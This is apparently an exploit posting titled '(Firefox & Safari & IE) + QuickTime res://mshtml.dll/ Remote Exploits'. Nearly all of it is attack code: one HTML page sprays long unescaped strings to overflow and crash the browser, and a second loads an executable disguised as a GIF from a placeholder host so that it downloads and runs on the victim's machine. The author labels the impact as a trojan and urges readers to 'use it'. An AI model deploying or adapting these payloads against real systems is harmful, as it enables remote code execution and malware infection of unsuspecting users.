(Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits

<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on :Windows XP SP3 (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5
###
# (~) Greetings To : all my hacker friends
###
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
function boom()
 {
 var longunistring1 = unescape("%u4141%u4141");
 var longunistring2 = unescape("%u4242%u4242");
 var longunistring3 = unescape("%u4343%u4343");
 var longunistring4 = unescape("%u4444%u4444");
 for(i=0; i <= 999 ; ++i) 
 {
  longunistring1+=longunistring1;
  longunistring2+=longunistring2;
  longunistring3+=longunistring3;
  longunistring4+=longunistring4;
  document.write(longunistring1);
  document.write(longunistring2);
  document.write(longunistring3);
  document.write(longunistring4);
 }     
 document.write(longunistring1);
 document.write(longunistring2);
 document.write(longunistring3);
 document.write(longunistring4);
 document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save Any HTML Code and Use him ( Boom !! :D )

This is really great..use it..and comment on it...